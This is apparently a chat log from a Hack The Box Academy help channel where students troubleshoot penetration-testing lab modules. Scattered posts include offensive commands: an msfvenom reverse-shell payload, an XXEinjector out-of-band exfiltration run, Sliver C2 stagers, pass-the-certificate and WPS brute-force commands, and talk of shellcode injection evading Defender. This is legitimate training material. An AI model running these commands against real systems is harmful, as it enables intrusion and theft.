Hi I have an issue on https://academy.hackthebox.com/app/module/267/section/3049 question 3. I follow the solution and find the value. However, the academy always said that my answer is incorrect. How can I find the correct answer??

All of other questions could be answered easily but except the question 3.

you need to submit the whole value

anyone could help?

It worked! thanks! I just saw that is has 2 colons.

Reach out to support to troubleshoot your connection to the VPN, etc.

hey! can somebody help me in the dm? I can't make a pass the hash work. I'm doing the AD skill assessment ii

dm please

Hello, I’m currently working through the AI Red Teamer path and have reached the Trojan Attack module. It involves quite a bit of Python coding, which I’m finding challenging.

I wanted to ask will this be a limitation for the COAE exam? Specifically, how important are strong Python skills for passing? Also, while solving the Trojan Attack challenge, I used AI tools (like ChatGPT) to help with some parts. Are AI assistance allowed during the exam, and if so, to what extent?

Just trying to understand how best to prepare and what I should have in my skillset before attempting the exam. Thanks!

There are no tool restrictions for the exam

Hey I am been going though Windows Event Logs and Finding Evil and I was wondering about the question 1. I did everything as it mention require to show the log from Event ID 7 and run the reflect DLL but it doesnt seem to update the Event Viewer

and I see some walkthough but they all bypass it by just calculate the Hash so it kind of defeat the purpose of execute the attack to see it you know

so not sure what am I missing here

Good peoples... I am on the Pentest in a nutshell module, on the Windows system enumeration portion... I downloaded and ran the winPEAS script on the Windows target. I can not find within the winPEAS output the exact OS version. WTH?

Hey, can someone help me with the Windows Privilege escalation module? I'm in the first bit and I am so confused: the answer should definitely be right but it keeps saying it's not

Is it possible to start another HTB Academy exam while another is in review? This would be a cool feature.

no

Are there plans to make this possible?

Not staff but afaik; also no

Not complaining btw. Theres lots of awesome learning to be had on HTB. Just sharing an idea to keep momentum going!

If you wanna share an idea : /feedback

Hello. I'm about to start the Penetration Tester Job role Path and I was wondering if anyone knows if I can stream or make video walkthroughs as I go?

HTB is free so I'm 90% sure there would be no issue.

Don't quote me on that though.

only on modules of tier 0

academy isn't 100% free; so that's just plain wrong

No shit sherlock I meant the free ones which he's most likley doing.

well the CPTS path isn't just tier 0 modules

no need to get pissy over a correction

Whos pissy?

You just said something plain obvious and said I'm plain wrong.

They should add a bullet point of: "Those who think they know everything"

"HTB is free"; academy is a paid platform - you telling someone 'yeah you can stream stuff' -- i added the correction of only tier 0, then told me 'no shit sherlock'. you got extremely defensive and for what

https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines; btw this is their guidelines @neon echo

HTB is free if your company pays for it 🤪

sure is 🙂

lol

Firewall and IDS/IPS Evasion (Hard Lab)

Goal: Identify the version of the service on port 50000/tcp (IBM DB2) for the Hard Lab flag.

The Problem: Despite various evasion techniques, the port consistently shows as filtered, and ncat connections are timing out.

What I’ve Tried (The "Fancy" Stuff):

Source port spoofing (-g 53)

Fragmentation (-f and --mtu 8)

Data padding (--data-length 25)

Decoys (-D RND:10)

What I’ve Tried (The "Un-Fancy" Advice):

Local Port Conflict: I have a listener on 10.255.255.254:53 in Pwnbox. I’ve tried fuser -k and kill -9 on port 53 to allow ncat to bind, but I still hit 'Address already in use' or TIMEOUT.

Manual Bind: Used ncat -nv --source-port 53 -s 172.28.145.11 to bind specifically to my VPN IP and bypass the local conflict. Still resulted in a TIMEOUT.

Target Resets: I’ve reset the instance multiple times and waited for the "shun" to clear before running simple nmap -sV -Pn -g 53 scans. Still filtered.

The Ask: Is there a specific timing (-T) or a different "trusted" source port (besides 53/443) that this instance requires? Or is there a trick to the Pwnbox DNS listener that I’m missing to get a clean ncat connection? Any pointers would be huge!

are you using the Pwnbox? there is a known issue with this lab only working on Pwnbox

https://cdn.discordapp.com/attachments/1179360318569316372/1261318963216781354/4x.gif

Hey yall! Quick question, I'm working through the Active Directory Enumeration and Attacks module, section Stacking the Deck - Privileged Access, and for the first question, I am unable for the life of me to get the provided bloodhound query that checks for CanPSRemote edges in the ingested data. Is this a known issue? Could it be an issue with how I've ingested the data (I used the provided SharpHound in the c:/tools folder)? Could it be that the query provided is for an older BloodHound version and it's a different query for BloodHound CE? Any ideas or suggestions are welcome, thanks!

SOLVED: I just had to use a more recent version of SharpHound... I guess the older version wasn't picking up the CanPSRemote edges 😵‍💫

dm please

dm

I need help in skill assessment of introduction to red teaming AI

Can someone help me with the skill assessment of the module Applications of AI in InfoSec? I was able to train a model with over 90% of Accuracy (locally, but when i submit the model to the machine ACADEMY-AISEC-INTROLAB:5000 i always get Your model accuracy is 0.0....

Were you able to solve this one eventually? I'm currently stuck at the same part, no clue how to solve it lol

Or if anyone else could help me out, I literally ended up copy-pasting the C# code from the module and added the shellcode generated by micr0_shell.py but I am not getting a reverse shell.
I was also sure to change the config to Release, x64 before compiling the build 🙁

I really have no Idea what was wrong and how I made it work, it's been a while.

I even went to check the DMs with the guy that said "DM ME" to see if anything can refresh my mind, but all what happened in that DM was that I told him to wait as I was testing something to see if it works or not, and it ended up working lol.

But make sure everything is x64 is what I would say.
Make sure the spawned instance of notepad is x64, the shellcode is x64, and the binary being built on x64.
This is everything I remember doing.
Good luck with it.

Unfortunate, I'll check over the code again to see where I might have screwed up lol.

Thanks anyways!

Sorry for the late reply but I appreciate the link

guys

i tried DACL

and i tried

Discretionary

BOTH ARE WRONG

WHAT

NVM

NOW IT WORKED

weird

i tried them yesterday night

maybe i was too sleep yor something i wrote it wrong

Hey gang. Working on Easy Assessment for the Attacking Common Services (don't worry, not showing spoilers), but when I found the name of the user, I wasn't able to crack it using Hydra.

I just tried it out locally by changing the shellcode to my own IP (Windows host) and it seemed to work without any trouble whatsoever but still fails on the provided target lol.
Guess it's some faulty background check that's screwing it up.

dm please

Hey, I'm re-doing the "Attacking Enterprise Networks" module and I'm stuck on the XSS lab where we have to steal the admin's session cookie.

I followed the exact same steps as described in the academy (and the same approach I used previously when I solved it), including:

• Setting up the PHP server
• Hosting script.js and index.php
• Injecting the XSS payload into the ticket

However, I'm not receiving any requests at all (no hits on script.js or index.php), even after:

• Resetting the target multiple times
• Trying different payload variants (external script and inline JS)
• Verifying my VPN IP and listener

It looks like the bot might not be triggering or not reaching my machine.

Is anyone else experiencing this issue, or could it be a problem with the lab environment?

You gotta think outside the box 📦

https://tenor.com/view/annoyed-andrew-tate-confuse-puzzled-cobra-tate-gif-26870852

What you think I did? xD I've also replicated the steps the academy suggests

Whats your payload like ? Send ss

If you are using that port then it should match with the php port

i did

i've just changed it

see

and nothing happened

Well maybe try adding things to it

'

"

Anything that could make it work

"Payload

I tried and nothing happened, and in the academy they use this, it's the same i'm using rn

Use "

Then the Paylaod

i'll reset the lab and try again

I think this has something to do with Academy

yep

I have been trying to connect to a module lab for like 30m

Restarted few times, nothing

I just reset the lab and now it's working. Maybe it was bugged or something, not sure.

are you doing attacking enterprise networks module?

Linux Forensics Module

Someone is having issues with connectivity too at #cpts

I just started the lab and seems to work

hi

@white vale

Nice

so for information gathering - web edition skills assessment, I am on a question that asks "What is the API key in the hidden admin directory that you have discovered on the target system?" so for that question, I have tried both with nikto and finalrecon to get the hidden API key I discovered on the target system. I found something that looked like a flag in a text file but I don't think that was it? can someone help me out here?

think simple; 🤖 : also think iterative; if it's not on one subdomain -- try another

hi can I DM you?

hi is this the right results from exported file from finalrecon (I removed the flag but it won't let me submit the flag because the question is a different question from the one I solved several years ago since it was updated):

┌──(kali㉿kali)-[~/…/share/finalrecon/dumps/fr_inlanefreight.com_28-04-2026_19:12:30]
└─$ cat *                      
200, http://inlanefreight.com:30899/
200, http://inlanefreight.com:30899/index.html
A : 134.209.24.248
AAAA : 2a03:b0c0:1:e0::32c:b001
MX : 10 mail1.inlanefreight.com.
NS : ns1.inlanefreight.com.
NS : ns2.inlanefreight.com.
SOA : ns-161.awsdns-20.com. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400
TXT : <FLAG HERE>
DMARC : "v=DMARC1; p=reject; rua=mailto:master@inlanefreight.com; ruf=mailto:master@inlanefreight.com; fo=1;"
Server: nginx/1.26.1
Date: Tue, 28 Apr 2026 23:12:32 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Thu, 01 Aug 2024 09:35:23 GMT
Connection: keep-alive
ETag: "66ab56db-78"
Accept-Ranges: bytes
53
31038
31337
Error: SSL is not Present on Target URL
inlanefreight.com
ns2.inlanefreight.com
support.inlanefreight.com
my.inlanefreight.com
ns1.inlanefreight.com
blog.inlanefreight.com
customer.inlanefreight.com
www.inlanefreight.com
ns3.inlanefreight.com
whois:    Domain Name: INLANEFREIGHT.COM
   Registry Domain ID: 2420436757_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.registrar.amazon
   Registrar URL: http://registrar.amazon.com
   Updated Date: 2025-07-01T22:45:43Z
   Creation Date: 2019-08-05T22:43:09Z
   Registry Expiry Date: 2026-08-05T22:43:09Z
   Registrar: Amazon Registrar, Inc.
   Registrar IANA ID: 468
   Registrar Abuse Contact Email: trustandsafety@support.aws.com
   Registrar Abuse Contact Phone: +1.2024422253
   Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
   Name Server: NS-1303.AWSDNS-34.ORG
   Name Server: NS-1580.AWSDNS-05.CO.UK
   Name Server: NS-161.AWSDNS-20.COM
   Name Server: NS-671.AWSDNS-19.NET
   DNSSEC: unsigned
   URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/

actually, is anyone able to DM later about this?

.com

Pretty sure the target is .htb :)

I cant for the life of me get the password to ssh into user8....Been trying for 20min straight, any help?

This is Intro To WIndows Command Line, Skill Assessment....

T_T

I tried the previous flags answer as the password, IT JUST DOESN'T WORK

dm please

Ah ok gotcha

Hello everyone. I'm working on a module called Wi-Fi Protected Setup (WPS) Attack.
Part 2 - Using Multiple Pre-defined PINs
The command is sudo reaver --max-attempts=1 -l 100 -r 3:45 -i mon0 -b 60:38:E0:A2:3D:2A -c 1 -p 73834410 (I have a different Pin and bssid).
but it freezes and doesn't work, and the bash script doesn't work either. Please help me figure out what the problem is.

@eternal vigil you were auto muted by the bot since you used a markdown hyperlink. i removed the timeout, go ahead and remake your post without the markdown hyperlink this time

Thankyou very much

Hello need help in module Cracking EAP-MD5 the last question number 3. I tried to crack but rockyou doesnt have the password in his list

hi

hi, im working on PT1 module "Online PIN Brute-Forcing Using Reaver". did you have any problems with the AP saying "[!] WARNING: Receive timeout occurred"? im trying to get WPS 8 digit PIN

no matter what i do i always get the timeout response

same here. Did you solve the problem?

No not yet…. I tried a lot and no luck… I even contacted support and they didn’t help me

same. contacted the support but no response

will contact you when i figure it out

hi, did you solve this?

can someone tell me what am I doing wrong here ?
ruby XXEinjector.rb --host=10.10.17.16 --httpport=8000 --file=/home/kali/XXEinjector/xxe.req --path=/327a6c4304ad5938eaf0efb6cc3e53dc.php --oob=http --phpfilter

xxe.req :-
POST /blind/submitDetails.php HTTP/1.1
Host: 10.129.22.95
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 139
Origin: http://10.129.22.95
Connection: keep-alive
Referer: http://10.129.22.95/
Priority: u=0

<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT

I am on Windows Lateral Movement - Skills Assessment - question 1 . I am stuck on this pswa for 3 hours already. need a nudge please . i have tried smb , ssh winrm, everying failed and i am with the web portion. when i use http it tells me to switch to https and when i switch to https it times out. please help me

Scan the target and you will find the port

Did you create a mon0 interface to use and set it to monitor or are you using wlan0mon?

i created the mon0 and set it to monitor

You can DM what you have tried.

Anyone completed the XXE sections ? I need to figure this out please.

How did you fix this? The SSH connection keeps dropping, and I can't see the rest of the command output I need.

What’s is the wrong output?

Yup me

I didn't use SSH. I enabled RDP and used that instead.

The tool should output a sort of a log file in the same directory as the tool containing the contents of this file /327a6c4304ad5938eaf0efb6cc3e53dc.php, but nothing is there at all

Hey everyone, can I ask for a help for optional exercise 1 in Cracking Passwords with Hashcat in the section called Cracking Miscellaneous Files & Hashes?

XXEinjector by Jakub Pałaczyński

Enumeration options:
"y" - enumerate currect file (default)
"n" - skip currect file
"a" - enumerate all files in currect directory
"s" - skip all files in currect directory
"q" - quit

[-] Multiple instances of XML found. It may results in false-positives.
[+] Sending request with malicious XML.
[+] Responding with XML for: /327a6c4304ad5938eaf0efb6cc3e53dc.php
[+] Retrieved data:
[+] Nothing else to do. Exiting.

@ebon gulch did you find it ?

I do
You can show the output

there is no other output but this

XXEinjector by Jakub Pałaczyński

Enumeration options:
"y" - enumerate currect file (default)
"n" - skip currect file
"a" - enumerate all files in currect directory
"s" - skip all files in currect directory
"q" - quit

[-] Multiple instances of XML found. It may results in false-positives.
[+] Sending request with malicious XML.
[+] Responding with XML for: /327a6c4304ad5938eaf0efb6cc3e53dc.php
[+] Retrieved data:
[+] Nothing else to do. Exiting.

Did you manage to read the output file?

that is the tool terminal output, it does not output a file

it should output a log file as how the section mentions

Try to restart the machine, and try to save the request manually by copy and paste it inside a .req file

I actually did try restarting the machine but the tool still fails to exfiltrate files

I also copied the request and pasted it in xxe.req and tried again but yet another failure

could you please test this lab by any chance ?

Yo guys, im on win privesc, server operators group abuse, im trying to query the appreadiness service, as well as searching for it in running services, but it seems to be stopped

Hello every one im new to the group and to HTB trying figure out how the learning process of the platform, I am currently on the "File Descriptors and Redirection" in the "Linux Fundamental" module. And with the information given i understand the Q1 for the Answer, but Q2, I have the answer, BUT, how was i supposed to get that Answer with the info that was given, above the question,,,,,,, can some one help me with the thought process. Thanks, The New Guy

I’m stuck on the Pass the Certificate section in Password Attacks under Windows Lateral Movement Techniques, Q1 for jpinkman’s desktop flag.

has anyone seen this error?
KDC has no support for PADATA type (pre-authentication data)

finally

part of the cpts tracks! very good box

gettgtpkinit.py -cert-pfx DC01.pfx -dc-ip $DC01 'inlanefreight.local/dc01$' /tmp/dc.ccache

did you do this part before?

I have details steps if you want I could share tips

dm me

maybe try nc

I did try

no banner

nmap would've showed the banner anyway

I've tried resetting the box multiple times, using another pc/vm, resetting my vpn .. still no fix

Section 1 of AI Red Teamer Path is so heavy. How are you all handling it without getting entangled in the complex web of math?

Hello, I 've been having the exact same issue

can anyone please help me with the credential hunting page on windows priv esc module
i found so many passwords but none work

look more, from what I remember it is like finding needle in hay. But it is there.

found it in the end but whoever made this question should be fired

In section Linux Information Gathering of Pentest in a Nutshell module: it is shown that wpscan can enumerate hash-form plugin.

wpscan -e p --url https://10.129.12.10 --disable-tls-checks --no-banner --plugins-detection aggressive -t 100
<snip>
[i] Plugin(s) Identified:

[+] hash-form
 | Location: <https://10.129.12.10/wp-content/plugins/hash-form/>
 | Last Updated: 2025-01-29T15:54:00.000Z
 | [!] The version is out of date, the latest version is 1.2.4
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 1.1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - <https://10.129.12.10/wp-content/plugins/hash-form/readme.txt>
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - <https://10.129.12.10/wp-content/plugins/hash-form/readme.txt>

But it no longer works (guess it is not top ~1500 plugin rn). It also does not work with --enumerate vp.
Was able to find it with this and wpscan knows it is vulnerable

 wpscan --url https://10.129.91.116 --disable-tls-checks --no-banner --plugins-detection aggressive --plugins-version-all -e p --plugins-list hash-form
<snip>
[i] Plugin(s) Identified:

[+] hash-form
<snip>```

wpscan has this in vulns. https://wpscan.com/vulnerability/4dda513f-a3d8-4bee-8e2f-ddb71a4d9735/

And yes I have updated wp-scan multiple times.

└─$ xfreerdp3 /v:box_ip /u:htb-student
[06:01:14:455] [825068:000c96f6] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]:     : keycode: 0x08 -> no RDP scancode found
[06:01:14:455] [825068:000c96f6] [WARN][com.freerdp.client.x11] - [load_map_from_xkbfile]: ZEHA: keycode: 0x5d -> no RDP scancode found
[06:01:16:394] [825068:000c96f6] [ERROR][com.freerdp.crypto] - [freerdp_tls_handshake]: BIO_do_handshake failed
[06:01:16:394] [825068:000c96f6] [ERROR][com.freerdp.core] - [transport_default_connect_tls]: ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]

Any advice on this tried changing VPN server TCP/UDP and respawning box a couple of times

Checked that I only have one tun interface unsure what else might be causing it not run, able to ping box too

nevermind seems rdp isn't working for this box, rdesktop worked tho 🙂

documentation & reporting > section 4 > Documentation & Reporting Practice Lab > Q1

" Once the target spawns, browse to the WriteHat instance on port 443 and authenticate with the provided admin credentials."

can anyone point me to where the writehat creds are located? i don't see anything listed on htb, there's nothing in the obsidian notebook, and the htb-student creds don't work

Can someone help me with Sliver

The module Intro to C2 with sliver to be specific

feel free to ask your question so others can help

According to the module, I have to create an .aspx file, and then upload it, and the stager in sliver will catch it and do the rest

but 1. generate stager command does not exist anymore, and if I just generate a msfvenom: msfvenom -p windows/shell/reverse_tcp LHOST=<C2-IP> LPORT=<stage-port> -f aspx > sliver.aspx -> it does not connect back to the stager on my c2

If you want to practice with the newer version this step I would suggest to go to the Assumed breach section, get the credentials, establish and RDP session and then play around with the options for the stager

Is this section buggy?

[10.10.15.246] sliver > jobs

ID Name Protocol Port Domains
==== =========== ========== ======= =========
1 grpc/mtls tcp 31337
2 TCP tcp 9001
3 http tcp 9000

[10.10.15.246] sliver > sessions

[*] No sessions 🙁

[10.10.15.246] sliver > profiles new --http 10.10.15.246:9000 --format shellcode --arch 386 htb2

[*] Saved new implant profile htb2

[10.10.15.246] sliver > stage-listener --url tcp://10.10.15.246:9002 --profile htb2 --prepend-size

[*] Job 4 (tcp) started

[10.10.15.246] sliver > sessions

[*] No sessions 🙁

[10.10.15.246] sliver > stage-listener --url tcp://10.10.15.246:9002 --profile htb2 --prepend-size

I don't think so as at the time of writing on the given Sliver version it worked

Ohh, cool then buddy

Let me do what you suggested

what does the c... mean?

i dont know what they mean with those channels

can anybody explain?

I'm working on the Hard assessment in "Attacking Common Services" module. I used Hydra to get Fiona's creds, able to connect to mssql, but I can't for the life of me figure out out to switch to John. I've tried Hydra, "exec_as_login / user", etc... I'm losing my mind 😄
EDIT: nvm... EXECUTE AS LOGIN = 'john'

hello, is there anyone that can you help me for last question of advancec sql injection on skills assesment

I need some help trying to figure out getting into jpinkman's account in Password Attacks Module, Pass the Certificate section. I was successfully able to download the certificate (with much head bashing). Now I can't seem to get gettgtpkinit to work and came across this error.

I am having the same error as we speak.

This XP for weekly steak is too high, like for weekly steak you need to pass too many sections xD

ME 2

Hi guys, anyone here can help me for last question in Intro to Assembly language module skill assesment? I used every way to get the flag, every time it gives me failed to run shellcode. Even created a shellcode using msfvenom, still same..

Hey guys, doing the hard lab in the footprinting section. Wondering if I need to be cracking something using a wordlist or not.

On Introduction to the Windows Command Line, question -

For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them.

There is no route to that network. I am on the target machine but there is no way to pivot. Am I understanding that right?

You can do challenges, boxes, etc to get xp also.

Ideally most people focus academy or labs at one time, but i did like 30% of one module and didnt get the minimum requirement to save the steak lol
Seems to be 3-5x times harder to keep the steak with the Academy

My ADHD ass finally finished the first module !!

can anyone help with nmap module hard lab?

dm please

i mean it explicitly tells you that you connect to that IP AFTER connecting to the initial 10.129.x.x target

I did connect to the target. It worked after restart though.

for windows related modules when i xfreerdp into windows machines it always disconnects after a short time and its super annoying. is there anyway to prevent this?

and the xfreerdp only successfully works like 1/7 tries

or smth like that

do you have multiple vpn's open? are you using the pwnbox at the same time as the vpn?

i only have one vpn open and i do not have pwnbox open at the same time

the one vpn being openvpn to the htb network with the file they give u to download

https://help.hackthebox.com/en/articles/12710285-connecting-to-academy-vpn

okay thanks i'll try switching protocol to tcp and see how it goes

that's a good one to do

it worked tysm

what should I do from here?

@quasi wave I deleted your post because it contained spoilers for a Tier II module

Hey all, is there any way to flag outdated module content? the JWT algorithm confusion lab was a PAIN to figure how to get around the provided steps since the cyberchef steps won't work

Ok sorry

You can post errors in the modules in #1234357888114364508

i am on the password attacks Attacking Active Directory and NTDS.dit: i cannot seem to find a valid username with kerbrute (even with the hint it feels weird why no combination is working) . is it because i am using the wrong domain? currently using Inlanefreight.local and also tried Inlanefreight as domain

dm please

Question! Is there a way I can remove a module from the Inprogress list? I enrolled in the Mac OS module, not realizing I'd need physical hardware 🙁

hi, im having some trouble whenever i try to do academy stuff, like nmap scans are insanely long compared to when using the pwnbox, is ther any reason why?

Are you using the pwnbox at the same time as your vm/vpn?

Nope i was using just my vpn

I used the pwnbox after

Physical hardware???

We dont require you to have physical hardware

It is strongly recommended to have your own in the MacOS module

but yeah not required

Might wanna look into this then, because this clearly says otherwise.

Literally says it on the Module Details... lol

You can solve it without a Mac

when i did this module i had to do some heavy googling for some of the questions, if i remember properly they ask you to look for packages using brew, it took me a while to find the right answer without a mac

it is indeed a pain

Stuck on Information Gathering - Web Edition skill assessment Q3 I have all the other answers but when I go to the hidden directory I get timed out?

Is this a error

Attacking Common Applications Challange Lab 1 - the lab keeps timing out.
I booted the lab about 20 minutes ago, gave it 10 minutes of peace, run nmap got a few open ports, went to make notes, and now I can't interact with the ports, they time out, and now nmap says host is down.

The online chat does not do technical support, so am I right to ask in here? if not, please redirect me to the correct channel/person

dm please

Is anyone else experiencing labs that are on for a little bit and then they time out for a few minutes?

it's so frustrating, this has been persisting for weeks

I don't know if it's just my lab but I'm wasting so much time, it's insane. I feel like i've been scammed by HTB subscription...

Ahh, they changed it then.

I need reconspider to to work for a specific module but the API key isn't working. I modified the /etc/reconspider/reconspider.conf file to include the API key but its asking for another API key

can someone help me with this?

I don't get why this is such a problem

Hi, I'm working on the "Applications of AI in InfoSec" course, specifically the Spam Detector model evaluation section.

I'm using the Playground VM with Jupyter. When I try to download the SMS Spam Collection dataset from the UCI repository using:

python
import requests
url = "https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip"
response = requests.get(url)
I get a NameResolutionError — DNS fails to resolve archive.ics.uci.edu. Ping to 8.8.8.8 works, so the VM has basic internet, but external HTTPS requests seem blocked.

The files in my Jupyter directory are: KDD+.txt, demo_dataset.csv, MNIST, malimg_paper_dataset_imgs — none of these are the SMS Spam dataset.

Questions:

Is the SMS Spam dataset supposed to be pre-loaded somewhere in the VM? If so, what's the path?

Is there a local endpoint on the evaluation portal (localhost:8000) to fetch the dataset?

If downloading is required, is there a proxy or alternative method that works in the Playground VM?

Thanks!

playground? you mean the pwnbox? playground is offsec; if you're a free user then the pwnbox has limited access to the internet

They would provide support for this kind of issue. Open a ticket next time you encounter it

they provide support for issues that are platform related, not skill related

I'm having issues with the Wi-Fi Penetration Testing Basics Module in Section Connecting to Wi-Fi Networks Step 3, I followed the same steps that were provided (both CLI and GUI) and it can't establish a connection. Tried restarting the lab a few times, nothing.

🔗 https://academy.hackthebox.com/app/module/222/section/3202

Why is there such a big spike in dificulty in linux fundamentals section 10?

Ahah, i owned root before the module asked to (Spoiling getting started module a bit)

i am currently attempting AEN blindly and i am stuck, can i DM anyone for nudge or a little help

Yes but not sure when I will be able to answer exactly 🙂

Issue keeps persisting.

Did you verify you received an IP address? Can DM if you need to disclose information that is considered spoiling content.

Did you run dhclient after the connection?

Oh gosh, always the little stupid mistakes, I forgot that, I didn't. Just got the flag, thanks.

@gray yacht Can I DM?

Sure

hello. can someone help me with the module Wi-Fi Password Cracking Techniques? i cant get of the section one. im on arch linux, i used opevpn to acess, and im still stuck on introduction. when i login via remmina, i access the desktop. i manage to change my interface into a monitor mode, but when i use the command provided, so:
airodump-ng wlan0mon -c 1 -w WPA
the device i discover dont have this EAPOL note. what am i doing wrong?

Are you stuck on the Introduction section? Pretty sure that's a theory based section.

i was mistaken, i was talking about section 2

so the The Traditional WPA Password Attack

Have you tried using SSH instead of RDP or a different RDP client?

right. i forgot i could use ssh i assumed i had to use RDP client as it said to RDP into. i'll try with ssh now

so i tried. i used airodump-ng on channel 1. i get the same results as before. so those:
BSSID STATION PWR Rate Lost Frames Notes Probes

D8:D6:3D:EB:29:D5 E6:C1:86:17:D9:28 -29 0 - 1 0 5 HackMe

maybe i had to scoan more broadly, but even as i do so i get no devices with EAPOL note

oh okay now it hit me

i had to de-authenticate first

okay i de-authenticated first, but still got the same problem. there's no 4 way handshake

maybe i'll try to do the same with pwnbox tough i doubt id make a difference

ok to dm?

You can DM what you have going on if nothing seems to be working.

i still have this issue even on x64 bit

the log just says it times out, even tested against locally and remotely on other systems and all works fine, except this machine

idk what is going on here

i get the following error each time

03/2026 07:20:59] C:\Alpha\ProcessInjection\ConsoleApp3.exe - OK - Undetected by Microsoft Defender Antivirus
[05/03/2026 07:20:59] C:\Alpha\ProcessInjection\ConsoleApp3.exe - OK - Running C:\Alpha\ProcessInjection\ConsoleApp3.exe
[05/03/2026 07:21:00] C:\Alpha\ProcessInjection\ConsoleApp3.exe - OK - Checking for calc.exe...
[05/03/2026 07:21:45] C:\Alpha\ProcessInjection\ConsoleApp3.exe - OK - Timeout reached, killing process

You have to follow it all precisely as the module shows. Not using x64 and not using the release version is the biggest reason I see this not working for people. Also do it in C# like the module teaches. Should work for you then.

i am tho. Im using x64 bit, written in c#, works locally and other systems but not on the box

And release version?

.net version you mean?

or visual studio?

that matters too, but not that's not what i was talking about

make sure to follow ALL the steps

tried on .net 4.7.2 and 4.8.

on 2022 vs

but i suppose you mean microshell?

should be C#

oh wait i may be thinking of another section, which section are you on?

i thought you were talking about static analysis

process injection

yeah

same thing though, you still need c# console app (.net framework), release version, x64, etc

i swear i have all of those correct

Currently i set it up with .net 4.8 as well

not familiar with that config thing i used VS

when i run the exe file on any other system now, localhost ect, even tested from a azure vm and it all worked fine and i got the shell

the only place it doesnt work is on the target lol

Using the AlsoNotMalware code?

yup

You wanna DM that so I can look it over?

sure

I was running into the same issue last week, I just ended up reading the flag from the solutions because likewise the exe worked everywhere except for the target

In Blind SQL Injection
Section: Remote Code Execution

I solved this section in Linux, using Netcat as a listener. However, when I try it in windows via powershell, I get GET /ncat.exe HTTP/1.1" 200 but it doesn't show anything on the listener

This is a general question that is not limit to Blind SQL injection

if anyone knows how to run netcat properly in powersell please let me know

is it important to be able to memorize the find <> command with all its options on section 10 linux fundamentals?

did anyone got stuck on the skills assessment of ffuf module? The question 3 specifically, its asking for the full page URL, i have tried scanning directories for all the subdomain i got, but i have nothing, then i tried looking if anyone else have different commands, they have the same command but have a result. but that result doesn't work on the question, whereas its actually say "You don't have access" according to the question.

Hi guys. I have 1 question for Bypassing Wi-Fi Captive Portals - Skills Assessment Q4. "Explore the captive portal of "Inlane-Internal-Wifi" and gain access to a restricted endpoint." - what is restricted endpoint? I tried endpoint like admin, restricted - no results. ffuf isn't installed on the attack box. any hints?

Of course not!
Just make your miles (NOT in a theorybook) and look it up when needed.
and...
They will stick when you use them many times.
type out commands, don't copy-paste!!!

Can you share a screenshot of the airodump output, and a screenshot of the EXACT command you ran to do send the deauth packages?
The most reasonable issue I first think of is an incorrect aireplay-ng command.

My problem is actually solved 🙂

I'm stuck on reconnaissance in the "bypassing captive portals" section (suspect an erratum, but first want to check here).

I'm asked to connect to HTB-Guest and find the gateway IP.

192.168.2.1 is the WRONG answer, dispite the highlighted output in the added screenshot.

Can someone expose my flaw in reasoning?

exact module/section
https://academy.hackthebox.com/app/module/299/section/3484

I reproduced the issue, best thing is to raise it in #1234357888114364508 so that the team can correct the issue when able

Tried it myself same thing, looks like a bug they have to fix. Worked months ago when I did that section, got a totally different result.

I've raised the issue in #1234357888114364508 for you @fresh ingot

Module Name : Understanding Log Sources & Investigating with Splunk
Section 2/6 : Using Splunk Applications

Question : Access the Sysmon App for Splunk and go to the "Reports" tab. Fix the search associated with the "Net - net view" report and provide the complete executed command as your answer. Answer format: net view /Domain:_.local

I can't solve it! The command that needs fixing is: `sysmon` process=net.exe (CommandLine="net view") | stats count by Computer,CommandLine

my failed attempt : `sysmon` EventCode=1 Image="*net.exe*" CommandLine="*net view*"
| stats count by Computer, CommandLine

I solved it.

👍

Once you connect to the gateway, what subnet are you getting an IP address from?

Hi guys, im trying the Password Cracking Attakcs Module, in the first section, Itroduction to John The Ripper, it asks me to crack the password it talked in the module, it is a single command, in single crack mode, and still the password is somehow wrong

||Tho i know the password i see is salted, it should give the real password by removing the salt, i guess||

Are you stuck on this one?

Yes, still stuck.

You can send me a DM with what you have been able to do/enumerate.

So it is cracking the hash, but not accepting the answer you are providing?

Yeah, from the password and the content i guess it is the right password. ||The password i get is rolf1911..rr0lf1900 and the module talks about someone names rolf, i tried submitting rr0lf1900 as i think the first part is salt but still nothing||

I tried also the full password, only the first part, and so on but nothing

Yeah that's not correct. Send me a DM so I can see what you are trying.

You need the full GEKKO

Which is in the reading

Hi all, anyone able to help me out on the last question in the NTLM Relaying skills assessment? Can’t figure out how to compromise the DC

hi i have an issue with the last network foundations task.

the question is what program runs on port 5901 - i connected via vpn, and everything worked, but it said theres nothing running on localhost:5901

OR do i have to use the pwnbox on this one?

im connected and even have the ip, but it just wont show me the 5901 port

You have to use the pwnbox for that one What is the the name of the Program listening on localhost:5901 of the Pwnbox?

It's not a service that would be running by default on an instance of Parrot you've installed yourself

aw okay! i mean it states clearly in the pwnbox but misleading af that you are able to connect to a vpn etc. it really should be rephrased or need a warning next to it to not use a vpn

thank you for the answer!

We're always open to /feedback, but it does clearly state of the Pwnbox. Feedback always welcome as I said, maybe it can be clarified further 🙂

(or #1234357888114364508)

Hi

Hey, could someone point me in the right direction for the final lab in the nmap networking module?

Source ports, read the ids/ips evasion carefully

Is anyone else here preparing for CJCA?

